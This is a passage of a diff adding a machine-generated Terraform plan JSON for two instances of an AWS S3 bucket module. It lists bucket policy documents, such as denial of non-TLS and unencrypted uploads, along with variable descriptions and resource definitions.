+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.allowed_kms_key_arn"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption-aws-kms-key-id"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyIncorrectKmsKeySse"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_incorrect_kms_key_sse"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_insecure_transport",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_insecure_transport",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:*"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "Bool"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "false"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SecureTransport"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this",
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyInsecureTransport"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_insecure_transport_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_unencrypted_object_uploads",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_unencrypted_object_uploads",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "Null"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            true
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyUnencryptedObjectUploads"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_unencrypted_object_uploads"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.elb_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "elb_log_delivery",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logdelivery.elasticloadbalancing.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": ""
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_elb_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.inventory_and_analytics_destination_policy",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "inventory_and_analytics_destination_policy",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "ArnLike"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.inventory_self_source_destination",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this",
+                                                            "var.inventory_source_bucket_arn",
+                                                            "var.analytics_self_source_destination",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this",
+                                                            "var.analytics_source_bucket_arn"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SourceArn"
+                                                    }
+                                                },
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.inventory_self_source_destination",
+                                                            "data.aws_caller_identity.current.id",
+                                                            "data.aws_caller_identity.current",
+                                                            "var.inventory_source_account_id",
+                                                            "var.analytics_self_source_destination",
+                                                            "data.aws_caller_identity.current.id",
+                                                            "data.aws_caller_identity.current",
+                                                            "var.analytics_source_account_id"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SourceAccount"
+                                                    }
+                                                },
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "bucket-owner-full-control"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-acl"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "destinationInventoryAndAnalyticsPolicy"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_inventory_destination_policy",
+                                        "var.attach_analytics_destination_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.lb_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "lb_log_delivery",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "bucket-owner-full-control"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-acl"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "delivery.logs.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSLogDeliveryWrite"
+                                            }
+                                        },
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:GetBucketAcl",
+                                                    "s3:ListBucket"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "delivery.logs.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSLogDeliveryAclCheck"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_lb_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.require_latest_tls",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "require_latest_tls",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:*"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "NumericLessThan"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "1.2"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:TlsVersion"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this",
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyOutdatedTLS"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_require_latest_tls_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_partition.current",
+                                "mode": "data",
+                                "type": "aws_partition",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "schema_version": 0
+                            },
+                            {
+                                "address": "data.aws_region.current",
+                                "mode": "data",
+                                "type": "aws_region",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket-1:aws",
+                                "schema_version": 0
+                            }
+                        ],
+                        "variables": {
+                            "acceleration_status": {
+                                "default": null,
+                                "description": "(Optional) Sets the accelerate configuration of an existing bucket. Can be Enabled or Suspended."
+                            },
+                            "access_log_delivery_policy_source_accounts": {
+                                "default": [],
+                                "description": "(Optional) List of AWS Account IDs should be allowed to deliver access logs to this bucket."
+                            },
+                            "access_log_delivery_policy_source_buckets": {
+                                "default": [],
+                                "description": "(Optional) List of S3 bucket ARNs wich should be allowed to deliver access logs to this bucket."
+                            },
+                            "acl": {
+                                "default": null,
+                                "description": "(Optional) The canned ACL to apply. Conflicts with `grant`"
+                            },
+                            "allowed_kms_key_arn": {
+                                "default": null,
+                                "description": "The ARN of KMS key which should be allowed in PutObject"
+                            },
+                            "analytics_configuration": {
+                                "default": {},
+                                "description": "Map containing bucket analytics configuration."
+                            },
+                            "analytics_self_source_destination": {
+                                "default": false,
+                                "description": "Whether or not the analytics source bucket is also the destination bucket."
+                            },
+                            "analytics_source_account_id": {
+                                "default": null,
+                                "description": "The analytics source account id."
+                            },
+                            "analytics_source_bucket_arn": {
+                                "default": null,
+                                "description": "The analytics source bucket ARN."
+                            },
+                            "attach_access_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have S3 access log delivery policy attached"
+                            },
+                            "attach_analytics_destination_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket analytics destination policy attached."
+                            },
+                            "attach_deny_incorrect_encryption_headers": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should deny incorrect encryption headers policy attached."
+                            },
+                            "attach_deny_incorrect_kms_key_sse": {
+                                "default": false,
+                                "description": "Controls if S3 bucket policy should deny usage of incorrect KMS key SSE."
+                            },
+                            "attach_deny_insecure_transport_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have deny non-SSL transport policy attached"
+                            },
+                            "attach_deny_unencrypted_object_uploads": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should deny unencrypted object uploads policy attached."
+                            },
+                            "attach_elb_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have ELB log delivery policy attached"
+                            },
+                            "attach_inventory_destination_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket inventory destination policy attached."
+                            },
+                            "attach_lb_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have ALB/NLB log delivery policy attached"
+                            },
+                            "attach_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket policy attached (set to `true` to use value of `policy` as bucket policy)"
+                            },
+                            "attach_public_policy": {
+                                "default": true,
+                                "description": "Controls if a user defined public bucket policy will be attached (set to `false` to allow upstream to apply defaults to the bucket)"
+                            },
+                            "attach_require_latest_tls_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should require the latest version of TLS"
+                            },
+                            "block_public_acls": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should block public ACLs for this bucket."
+                            },
+                            "block_public_policy": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should block public bucket policies for this bucket."
+                            },
+                            "bucket": {
+                                "default": null,
+                                "description": "(Optional, Forces new resource) The name of the bucket. If omitted, Terraform will assign a random, unique name."
+                            },
+                            "bucket_prefix": {
+                                "default": null,
+                                "description": "(Optional, Forces new resource) Creates a unique bucket name beginning with the specified prefix. Conflicts with bucket."
+                            },
+                            "control_object_ownership": {
+                                "default": false,
+                                "description": "Whether to manage S3 Bucket Ownership Controls on this bucket."
+                            },
+                            "cors_rule": {
+                                "default": [],
+                                "description": "List of maps containing rules for Cross-Origin Resource Sharing."
+                            },
+                            "create_bucket": {
+                                "default": true,
+                                "description": "Controls if S3 bucket should be created"
+                            },
+                            "expected_bucket_owner": {
+                                "default": null,
+                                "description": "The account ID of the expected bucket owner"
+                            },
+                            "force_destroy": {
+                                "default": false,
+                                "description": "(Optional, Default:false ) A boolean that indicates all objects should be deleted from the bucket so that the bucket can be destroyed without error. These objects are not recoverable."
+                            },
+                            "grant": {
+                                "default": [],
+                                "description": "An ACL policy grant. Conflicts with `acl`"
+                            },
+                            "ignore_public_acls": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should ignore public ACLs for this bucket."
+                            },
+                            "intelligent_tiering": {
+                                "default": {},
+                                "description": "Map containing intelligent tiering configuration."
+                            },
+                            "inventory_configuration": {
+                                "default": {},
+                                "description": "Map containing S3 inventory configuration."
+                            },
+                            "inventory_self_source_destination": {
+                                "default": false,
+                                "description": "Whether or not the inventory source bucket is also the destination bucket."
+                            },
+                            "inventory_source_account_id": {
+                                "default": null,
+                                "description": "The inventory source account id."
+                            },
+                            "inventory_source_bucket_arn": {
+                                "default": null,
+                                "description": "The inventory source bucket ARN."
+                            },
+                            "lifecycle_rule": {
+                                "default": [],
+                                "description": "List of maps containing configuration of object lifecycle management."
+                            },
+                            "logging": {
+                                "default": {},
+                                "description": "Map containing access bucket logging configuration."
+                            },
+                            "metric_configuration": {
+                                "default": [],
+                                "description": "Map containing bucket metric configuration."
+                            },
+                            "object_lock_configuration": {
+                                "default": {},
+                                "description": "Map containing S3 object locking configuration."
+                            },
+                            "object_lock_enabled": {
+                                "default": false,
+                                "description": "Whether S3 bucket should have an Object Lock configuration enabled."
+                            },
+                            "object_ownership": {
+                                "default": "BucketOwnerEnforced",
+                                "description": "Object ownership. Valid values: BucketOwnerEnforced, BucketOwnerPreferred or ObjectWriter. 'BucketOwnerEnforced': ACLs are disabled, and the bucket owner automatically owns and has full control over every object in the bucket. 'BucketOwnerPreferred': Objects uploaded to the bucket change ownership to the bucket owner if the objects are uploaded with the bucket-owner-full-control canned ACL. 'ObjectWriter': The uploading account will own the object if the object is uploaded with the bucket-owner-full-control canned ACL."
+                            },
+                            "owner": {
+                                "default": {},
+                                "description": "Bucket owner's display name and ID. Conflicts with `acl`"
+                            },
+                            "policy": {
+                                "default": null,
+                                "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide."
+                            },
+                            "replication_configuration": {
+                                "default": {},
+                                "description": "Map containing cross-region replication configuration."
+                            },
+                            "request_payer": {
+                                "default": null,
+                                "description": "(Optional) Specifies who should bear the cost of Amazon S3 data transfer. Can be either BucketOwner or Requester. By default, the owner of the S3 bucket would incur the costs of any data transfer. See Requester Pays Buckets developer guide for more information."
+                            },
+                            "restrict_public_buckets": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should restrict public bucket policies for this bucket."
+                            },
+                            "server_side_encryption_configuration": {
+                                "default": {},
+                                "description": "Map containing server-side encryption configuration."
+                            },
+                            "tags": {
+                                "default": {},
+                                "description": "(Optional) A mapping of tags to assign to the bucket."
+                            },
+                            "versioning": {
+                                "default": {},
+                                "description": "Map containing versioning configuration."
+                            },
+                            "website": {
+                                "default": {},
+                                "description": "Map containing static web-site hosting or redirect configuration."
+                            }
+                        }
+                    },
+                    "version_constraint": "4.0.1"
+                },
+                "s3-bucket-2": {
+                    "source": "terraform-aws-modules/s3-bucket/aws",
+                    "module": {
+                        "outputs": {
+                            "s3_bucket_arn": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].arn",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The ARN of the bucket. Will be of format arn:aws:s3:::bucketname."
+                            },
+                            "s3_bucket_bucket_domain_name": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].bucket_domain_name",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The bucket domain name. Will be of format bucketname.s3.amazonaws.com."
+                            },
+                            "s3_bucket_bucket_regional_domain_name": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].bucket_regional_domain_name",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The bucket region-specific domain name. The bucket domain name including the region name, please refer here for format. Note: The AWS CloudFront allows specifying S3 region-specific endpoint when creating S3 origin, it will prevent redirect issues from CloudFront to S3 Origin URL."
+                            },
+                            "s3_bucket_hosted_zone_id": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].hosted_zone_id",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The Route 53 Hosted Zone ID for this bucket's region."
+                            },
+                            "s3_bucket_id": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_policy.this[0].id",
+                                        "aws_s3_bucket_policy.this[0]",
+                                        "aws_s3_bucket_policy.this",
+                                        "aws_s3_bucket.this[0].id",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The name of the bucket."
+                            },
+                            "s3_bucket_lifecycle_configuration_rules": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_lifecycle_configuration.this[0].rule",
+                                        "aws_s3_bucket_lifecycle_configuration.this[0]",
+                                        "aws_s3_bucket_lifecycle_configuration.this"
+                                    ]
+                                },
+                                "description": "The lifecycle rules of the bucket, if the bucket is configured with lifecycle rules. If not, this will be an empty string."
+                            },
+                            "s3_bucket_policy": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_policy.this[0].policy",
+                                        "aws_s3_bucket_policy.this[0]",
+                                        "aws_s3_bucket_policy.this"
+                                    ]
+                                },
+                                "description": "The policy of the bucket, if the bucket is configured with a policy. If not, this will be an empty string."
+                            },
+                            "s3_bucket_region": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket.this[0].region",
+                                        "aws_s3_bucket.this[0]",
+                                        "aws_s3_bucket.this"
+                                    ]
+                                },
+                                "description": "The AWS region this bucket resides in."
+                            },
+                            "s3_bucket_website_domain": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_website_configuration.this[0].website_domain",
+                                        "aws_s3_bucket_website_configuration.this[0]",
+                                        "aws_s3_bucket_website_configuration.this"
+                                    ]
+                                },
+                                "description": "The domain of the website endpoint, if the bucket is configured with a website. If not, this will be an empty string. This is used to create Route 53 alias records."
+                            },
+                            "s3_bucket_website_endpoint": {
+                                "expression": {
+                                    "references": [
+                                        "aws_s3_bucket_website_configuration.this[0].website_endpoint",
+                                        "aws_s3_bucket_website_configuration.this[0]",
+                                        "aws_s3_bucket_website_configuration.this"
+                                    ]
+                                },
+                                "description": "The website endpoint, if the bucket is configured with a website. If not, this will be an empty string."
+                            }
+                        },
+                        "resources": [
+                            {
+                                "address": "aws_s3_bucket.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "var.bucket"
+                                        ]
+                                    },
+                                    "bucket_prefix": {
+                                        "references": [
+                                            "var.bucket_prefix"
+                                        ]
+                                    },
+                                    "force_destroy": {
+                                        "references": [
+                                            "var.force_destroy"
+                                        ]
+                                    },
+                                    "object_lock_enabled": {
+                                        "references": [
+                                            "var.object_lock_enabled"
+                                        ]
+                                    },
+                                    "tags": {
+                                        "references": [
+                                            "var.tags"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_accelerate_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_accelerate_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "status": {
+                                        "references": [
+                                            "var.acceleration_status"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.acceleration_status"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_acl.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_acl",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "acl": {
+                                        "references": [
+                                            "var.acl",
+                                            "var.acl"
+                                        ]
+                                    },
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.create_bucket_acl"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_ownership_controls.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_analytics_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_analytics_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "var.analytics_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_cors_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_cors_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.cors_rules"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_intelligent_tiering_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_intelligent_tiering_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    },
+                                    "status": {
+                                        "references": [
+                                            "each.value.status",
+                                            "each.value",
+                                            "each.value.status",
+                                            "each.value"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "local.intelligent_tiering",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_inventory.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_inventory",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "each.value.bucket",
+                                            "each.value",
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "destination": [
+                                        {
+                                            "bucket": [
+                                                {
+                                                    "account_id": {
+                                                        "references": [
+                                                            "each.value.destination.account_id",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    },
+                                                    "bucket_arn": {
+                                                        "references": [
+                                                            "each.value.destination.bucket_arn",
+                                                            "each.value.destination",
+                                                            "each.value",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this"
+                                                        ]
+                                                    },
+                                                    "format": {
+                                                        "references": [
+                                                            "each.value.destination.format",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    },
+                                                    "prefix": {
+                                                        "references": [
+                                                            "each.value.destination.prefix",
+                                                            "each.value.destination",
+                                                            "each.value"
+                                                        ]
+                                                    }
+                                                }
+                                            ]
+                                        }
+                                    ],
+                                    "enabled": {
+                                        "references": [
+                                            "each.value.enabled",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "included_object_versions": {
+                                        "references": [
+                                            "each.value.included_object_versions",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "name": {
+                                        "references": [
+                                            "each.key"
+                                        ]
+                                    },
+                                    "optional_fields": {
+                                        "references": [
+                                            "each.value.optional_fields",
+                                            "each.value"
+                                        ]
+                                    },
+                                    "schedule": [
+                                        {
+                                            "frequency": {
+                                                "references": [
+                                                    "each.value.frequency",
+                                                    "each.value"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "for_each_expression": {
+                                    "references": [
+                                        "var.inventory_configuration",
+                                        "local.create_bucket"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_lifecycle_configuration.this",
